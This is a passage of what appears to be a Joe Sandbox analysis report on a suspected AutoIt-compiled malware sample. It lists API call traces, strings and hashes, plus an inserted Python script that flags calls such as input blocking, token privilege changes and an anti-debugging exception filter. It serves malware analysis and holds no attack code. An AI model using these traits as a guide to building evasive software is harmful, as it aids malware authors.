                                • Instruction Fuzzy Hash: BA019279A01209EFCB44DF99C6909AEF7F5FB88310F248599E819A7341D770AE41DB80
                                Memory Dump Source
                                • Source File: 00000000.00000002.2063045889.00000000036DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 036DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_36dd000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                • Instruction ID: cc30c989bb0469c60cc2a96047832f38ba23b6601e0db4d855f0b79cb5c1781f
                                • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                • Instruction Fuzzy Hash: 08019278A01209EFCB44DF99C6909AEF7B5FB48310F208599D819A7301D770AE42DF80
                                Memory Dump Source
                                • Source File: 00000000.00000002.2063045889.00000000036DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 036DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_36dd000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
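The "APIs" records on this page (AdjustTokenPrivileges, RaiseException with C000000D, BlockInput(00000001), SetUnhandledExceptionFilter, and the CreateWindowExW call naming "AutoIt v3" in the record that follows) share one line format: "API.MODULE(args), ref: call-site". The script below, added here by the editor and not part of Joe Sandbox or its IDA plugin, parses that format out of a pasted listing and flags the calls an analyst would look at first. The sample lines are copied from this report; the triage rules, their wording and the helper names (parse_api_calls, hex_arg, triage) are the editor's assumptions, not Joe Sandbox signatures.

```python
"""Triage helper for Joe Sandbox "APIs" records.

Editor's example, not Joe Sandbox code.  The line format is taken from the
listing on this page; the triage rules are the editor's own assumptions.
"""
import re
from dataclasses import dataclass

# Constructed excerpt: lines copied from the function records on this page,
# plus one non-API record line to show that it is ignored.
SAMPLE = """
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001B11FC), ref: 001B10D4
• CloseHandle.KERNEL32(?,?,001B11FC), ref: 001B10E9
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00186766,?,?,00000008,?,?,0018FEFE,00000000), ref: 00186998
• BlockInput.USER32(00000001), ref: 001CEABD
• SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,001703EE), ref: 001709DA
• DestroyWindow.USER32 ref: 001D2B52
• CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D2CF8
• Instruction Fuzzy Hash: 69E04F312102049FC710EF69D844E9AF7E9AFA8760F00841AFC49CB751DBB0E8458B90
"""

# "<API>.<MODULE>(<args>), ref: <hex address>"; the parenthesised argument
# list is absent when the plugin recovered no arguments (e.g. DestroyWindow).
LINE_RE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

STATUS_INVALID_PARAMETER = 0xC000000D  # NTSTATUS code passed to RaiseException above


@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # raw argument strings; "?" means the plugin could not resolve the value
    ref: int     # call-site address


def parse_api_calls(text):
    """Parse every '• API.MODULE(args), ref: addr' line; all other record lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def hex_arg(call, index):
    """Argument `index` as an int when the plugin resolved it to a hex constant, else None."""
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):
        return None


def triage(calls):
    """Return (call-site, note) pairs for calls worth a second look, ordered by address.

    The rules encode what an analyst would flag by hand; they are the editor's
    assumptions, not Joe Sandbox signatures.
    """
    findings = []
    for c in calls:
        if c.api == "BlockInput" and hex_arg(c, 0) == 1:
            findings.append((c.ref, "BlockInput(TRUE): user keyboard/mouse input disabled"))
        elif c.api == "AdjustTokenPrivileges":
            findings.append((c.ref, "AdjustTokenPrivileges: process token privileges modified"))
        elif c.api == "SetUnhandledExceptionFilter":
            findings.append((c.ref, "SetUnhandledExceptionFilter: top-level filter installed "
                                    "(the filter is not invoked while a debugger is attached)"))
        elif c.api == "RaiseException" and hex_arg(c, 0) == STATUS_INVALID_PARAMETER:
            findings.append((c.ref, "RaiseException(STATUS_INVALID_PARAMETER)"))
        elif c.api == "CreateWindowExW" and "AutoIt v3" in c.args:
            findings.append((c.ref, "CreateWindowExW: 'AutoIt v3' window, consistent with a compiled AutoIt script"))
    return sorted(findings)


if __name__ == "__main__":
    for ref, note in triage(parse_api_calls(SAMPLE)):
        print(f"{ref:08X}  {note}")
```

Paste the full "APIs" sections of a report into SAMPLE (or read them from a file) to get the same ordered list for every function; arguments shown as "?" are unresolved and are deliberately never matched against a constant, so a rule that needs a value (BlockInput's fBlockIt, RaiseException's code) only fires on values the plugin actually recovered.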
                                APIs
                                • DeleteObject.GDI32(00000000), ref: 001D2B30
                                • DeleteObject.GDI32(00000000), ref: 001D2B43
                                • DestroyWindow.USER32 ref: 001D2B52
                                • GetDesktopWindow.USER32 ref: 001D2B6D
                                • GetWindowRect.USER32(00000000), ref: 001D2B74
                                • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 001D2CA3
                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 001D2CB1
                                • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D2CF8
                                • GetClientRect.USER32(00000000,?), ref: 001D2D04
                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 001D2D40
                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D2D62
                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D2D75
                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D2D80
                                • GlobalLock.KERNEL32(00000000), ref: 001D2D89
                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D2D98
                                • GlobalUnlock.KERNEL32(00000000), ref: 001D2DA1
                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D2DA8
                                • GlobalFree.KERNEL32(00000000), ref: 001D2DB3
                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D2DC5
                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,001EFC38,00000000), ref: 001D2DDB
                                • GlobalFree.KERNEL32(00000000), ref: 001D2DEB
                                • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 001D2E11
                                • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 001D2E30
                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D2E52
                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 001D303F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                • String ID: $AutoIt v3$DISPLAY$static
                                • API String ID: 2211948467-2373415609
                                • Opcode ID: bdbce7ab3199b405c73918352b6fda58f087aff008c3610c3d916937fcd7f5a4
                                • Instruction ID: 93cb1c733b231ba24f17ad85398abc25f9440797df77b5f07980b71f74e5f624
                                • Opcode Fuzzy Hash: bdbce7ab3199b405c73918352b6fda58f087aff008c3610c3d916937fcd7f5a4
                                • Instruction Fuzzy Hash: C4028D71900205EFDB14DFA4DC89EAE7BB9FF58311F008559F925AB2A1D770AD42CBA0
                                APIs
                                • SetTextColor.GDI32(?,00000000), ref: 001E712F
                                • GetSysColorBrush.USER32(0000000F), ref: 001E7160
                                • GetSysColor.USER32(0000000F), ref: 001E716C
                                • SetBkColor.GDI32(?,000000FF), ref: 001E7186
                                • SelectObject.GDI32(?,?), ref: 001E7195
                                • InflateRect.USER32(?,000000FF,000000FF), ref: 001E71C0
                                • GetSysColor.USER32(00000010), ref: 001E71C8
                                • CreateSolidBrush.GDI32(00000000), ref: 001E71CF
                                • FrameRect.USER32(?,?,00000000), ref: 001E71DE
                                • DeleteObject.GDI32(00000000), ref: 001E71E5
                                • InflateRect.USER32(?,000000FE,000000FE), ref: 001E7230
                                • FillRect.USER32(?,?,?), ref: 001E7262
                                • GetWindowLongW.USER32(?,000000F0), ref: 001E7284
                                  • Part of subcall function 001E73E8: GetSysColor.USER32(00000012), ref: 001E7421
                                  • Part of subcall function 001E73E8: SetTextColor.GDI32(?,?), ref: 001E7425
                                  • Part of subcall function 001E73E8: GetSysColorBrush.USER32(0000000F), ref: 001E743B
                                  • Part of subcall function 001E73E8: GetSysColor.USER32(0000000F), ref: 001E7446
                                  • Part of subcall function 001E73E8: GetSysColor.USER32(00000011), ref: 001E7463
                                  • Part of subcall function 001E73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 001E7471
                                  • Part of subcall function 001E73E8: SelectObject.GDI32(?,00000000), ref: 001E7482
                                  • Part of subcall function 001E73E8: SetBkColor.GDI32(?,00000000), ref: 001E748B
                                  • Part of subcall function 001E73E8: SelectObject.GDI32(?,?), ref: 001E7498
                                  • Part of subcall function 001E73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 001E74B7
                                  • Part of subcall function 001E73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001E74CE
                                  • Part of subcall function 001E73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 001E74DB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                • String ID:
                                • API String ID: 4124339563-0
                                • Opcode ID: cb0534d2f7f55efdf8aed4d340344ad3a92f72056363e7a5c901dfba8f081655
                                • Instruction ID: a9449cc8ad0ee7238bf51cf2e7250b22b577f3f6b3cbcb47a3b0ae037e9a534a
                                • Opcode Fuzzy Hash: cb0534d2f7f55efdf8aed4d340344ad3a92f72056363e7a5c901dfba8f081655
                                • Instruction Fuzzy Hash: 15A1B472108741EFD7049FA0DC88E5F7BA9FF49720F100A19FA629A1E1D731D985CB91
                                APIs
                                • DestroyWindow.USER32(?,?), ref: 00168E14
                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 001A6AC5
                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 001A6AFE
                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 001A6F43
                                  • Part of subcall function 00168F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00168BE8,?,00000000,?,?,?,?,00168BBA,00000000,?), ref: 00168FC5
                                • SendMessageW.USER32(?,00001053), ref: 001A6F7F
                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 001A6F96
                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 001A6FAC
                                • ImageList_Destroy.COMCTL32(00000000,?), ref: 001A6FB7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                • String ID: 0
                                • API String ID: 2760611726-4108050209
                                • Opcode ID: b01689f40c329f0fde5526cc91832acd6e4d17ac4e1a7ce6dad196f4613f04a0
                                • Instruction ID: 473aac98cc1af3dea423040815ac39ec440190bfae81421ca191733310bfa069
                                • Opcode Fuzzy Hash: b01689f40c329f0fde5526cc91832acd6e4d17ac4e1a7ce6dad196f4613f04a0
                                • Instruction Fuzzy Hash: 7912B038200251EFD725CF54DC98BAAB7E1FB5A310F184569F4858B661CB32ECA2CB91
                                APIs
                                • DestroyWindow.USER32(00000000), ref: 001D273E
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001D286A
                                • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 001D28A9
                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 001D28B9
                                • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 001D2900
                                • GetClientRect.USER32(00000000,?), ref: 001D290C
                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 001D2955
                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001D2964
                                • GetStockObject.GDI32(00000011), ref: 001D2974
                                • SelectObject.GDI32(00000000,00000000), ref: 001D2978
                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 001D2988
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001D2991
                                • DeleteDC.GDI32(00000000), ref: 001D299A
                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 001D29C6
                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 001D29DD
                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 001D2A1D
                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 001D2A31
                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 001D2A42
                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 001D2A77
                                • GetStockObject.GDI32(00000011), ref: 001D2A82
                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 001D2A8D
                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 001D2A97
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                • API String ID: 2910397461-517079104
                                • Opcode ID: 1b2810f6353bd85250225cfc6bf5ee3f62afb3181a3601218adaa97e1021ab11
                                • Instruction ID: 17cb5870b8562eb448c83c801850bed6b8b7020c03c95e6f60ef50bff37256ef
                                • Opcode Fuzzy Hash: 1b2810f6353bd85250225cfc6bf5ee3f62afb3181a3601218adaa97e1021ab11
                                • Instruction Fuzzy Hash: 39B14D71A00215BFEB24DFA8DC89FAE7BA9EF18711F004155F925EB290D774AD41CB90
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 001C4AED
                                • GetDriveTypeW.KERNEL32(?,001ECB68,?,\\.\,001ECC08), ref: 001C4BCA
                                • SetErrorMode.KERNEL32(00000000,001ECB68,?,\\.\,001ECC08), ref: 001C4D36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorMode$DriveType
                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                • API String ID: 2907320926-4222207086
                                • Opcode ID: d1388a4475e5106d23d2298e0cfcc00b0c00d580c18bd442a55fe4a5ae05a316
                                • Instruction ID: bab4435372af537b66c9769d7ea0faaf7a15a1a38088cd0e74721ec1406a7f3f
                                • Opcode Fuzzy Hash: d1388a4475e5106d23d2298e0cfcc00b0c00d580c18bd442a55fe4a5ae05a316
                                • Instruction Fuzzy Hash: 0861E430619105DBCB18DF64DAA6FBD77F0AB35300B25401DF806AB6A1DB31ED91DB85
                                APIs
                                • GetSysColor.USER32(00000012), ref: 001E7421
                                • SetTextColor.GDI32(?,?), ref: 001E7425
                                • GetSysColorBrush.USER32(0000000F), ref: 001E743B
                                • GetSysColor.USER32(0000000F), ref: 001E7446
                                • CreateSolidBrush.GDI32(?), ref: 001E744B
                                • GetSysColor.USER32(00000011), ref: 001E7463
                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 001E7471
                                • SelectObject.GDI32(?,00000000), ref: 001E7482
                                • SetBkColor.GDI32(?,00000000), ref: 001E748B
                                • SelectObject.GDI32(?,?), ref: 001E7498
                                • InflateRect.USER32(?,000000FF,000000FF), ref: 001E74B7
                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 001E74CE
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 001E74DB
                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 001E752A
                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 001E7554
                                • InflateRect.USER32(?,000000FD,000000FD), ref: 001E7572
                                • DrawFocusRect.USER32(?,?), ref: 001E757D
                                • GetSysColor.USER32(00000011), ref: 001E758E
                                • SetTextColor.GDI32(?,00000000), ref: 001E7596
                                • DrawTextW.USER32(?,001E70F5,000000FF,?,00000000), ref: 001E75A8
                                • SelectObject.GDI32(?,?), ref: 001E75BF
                                • DeleteObject.GDI32(?), ref: 001E75CA
                                • SelectObject.GDI32(?,?), ref: 001E75D0
                                • DeleteObject.GDI32(?), ref: 001E75D5
                                • SetTextColor.GDI32(?,?), ref: 001E75DB
                                • SetBkColor.GDI32(?,?), ref: 001E75E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                • String ID:
                                • API String ID: 1996641542-0
                                • Opcode ID: 2240d6def131cc0b1d234fec31fd910dd30ab7d6fbb3486018607fa498624344
                                • Instruction ID: 9e9bfa0b927b88eb5b451ceeb98e7c533c50149b534e23c2c99257dc8bcdc63f
                                • Opcode Fuzzy Hash: 2240d6def131cc0b1d234fec31fd910dd30ab7d6fbb3486018607fa498624344
                                • Instruction Fuzzy Hash: 3B616B72900658AFEB059FA4DC89EEEBFB9EF08720F114115F911AB2E1D7709981DF90
                                APIs
                                • GetCursorPos.USER32(?), ref: 001E1128
                                • GetDesktopWindow.USER32 ref: 001E113D
                                • GetWindowRect.USER32(00000000), ref: 001E1144
                                • GetWindowLongW.USER32(?,000000F0), ref: 001E1199
                                • DestroyWindow.USER32(?), ref: 001E11B9
                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001E11ED
                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001E120B
                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001E121D
                                • SendMessageW.USER32(00000000,00000421,?,?), ref: 001E1232
                                • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 001E1245
                                • IsWindowVisible.USER32(00000000), ref: 001E12A1
                                • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 001E12BC
                                • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 001E12D0
                                • GetWindowRect.USER32(00000000,?), ref: 001E12E8
                                • MonitorFromPoint.USER32(?,?,00000002), ref: 001E130E
                                • GetMonitorInfoW.USER32(00000000,?), ref: 001E1328
                                • CopyRect.USER32(?,?), ref: 001E133F
                                • SendMessageW.USER32(00000000,00000412,00000000), ref: 001E13AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                • String ID: ($0$tooltips_class32
                                • API String ID: 698492251-4156429822
                                • Opcode ID: f399afb9ab7c2b6a135886147c178710555e6e8ac1ec5143bf23919f1a0ab41a
                                • Instruction ID: db30d930097fb3911154dec201ef2e76b74d6876501bfdd7ead7364d144a3d93
                                • Opcode Fuzzy Hash: f399afb9ab7c2b6a135886147c178710555e6e8ac1ec5143bf23919f1a0ab41a
                                • Instruction Fuzzy Hash: E1B17971608781AFDB14DF65C884B6FBBE5FF88350F008918F9999B2A1D731E845CB92
                                APIs
                                • CharUpperBuffW.USER32(?,?), ref: 001E02E5
                                • _wcslen.LIBCMT ref: 001E031F
                                • _wcslen.LIBCMT ref: 001E0389
                                • _wcslen.LIBCMT ref: 001E03F1
                                • _wcslen.LIBCMT ref: 001E0475
                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 001E04C5
                                • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001E0504
                                  • Part of subcall function 0016F9F2: _wcslen.LIBCMT ref: 0016F9FD
                                  • Part of subcall function 001B223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001B2258
                                  • Part of subcall function 001B223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 001B228A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                • API String ID: 1103490817-719923060
                                • Opcode ID: 422e5891c70774033487f9dd62a0abb47b3f090d928964e18ced979dd056f0ba
                                • Instruction ID: bd43e588c803105df65aca8b15ac5f86d4787dc306c01acb77e9eb34a7afb77f
                                • Opcode Fuzzy Hash: 422e5891c70774033487f9dd62a0abb47b3f090d928964e18ced979dd056f0ba
                                • Instruction Fuzzy Hash: B5E1C1312186818FC719DF29C99096EB3E1BFEC314B14495DF8969B3A1DB70ED85CB81
                                APIs
                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00168968
                                • GetSystemMetrics.USER32(00000007), ref: 00168970
                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0016899B
                                • GetSystemMetrics.USER32(00000008), ref: 001689A3
                                • GetSystemMetrics.USER32(00000004), ref: 001689C8
                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001689E5
                                • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001689F5
                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00168A28
                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00168A3C
                                • GetClientRect.USER32(00000000,000000FF), ref: 00168A5A
                                • GetStockObject.GDI32(00000011), ref: 00168A76
                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 00168A81
                                  • Part of subcall function 0016912D: GetCursorPos.USER32(?), ref: 00169141
                                  • Part of subcall function 0016912D: ScreenToClient.USER32(00000000,?), ref: 0016915E
                                  • Part of subcall function 0016912D: GetAsyncKeyState.USER32(00000001), ref: 00169183
                                  • Part of subcall function 0016912D: GetAsyncKeyState.USER32(00000002), ref: 0016919D
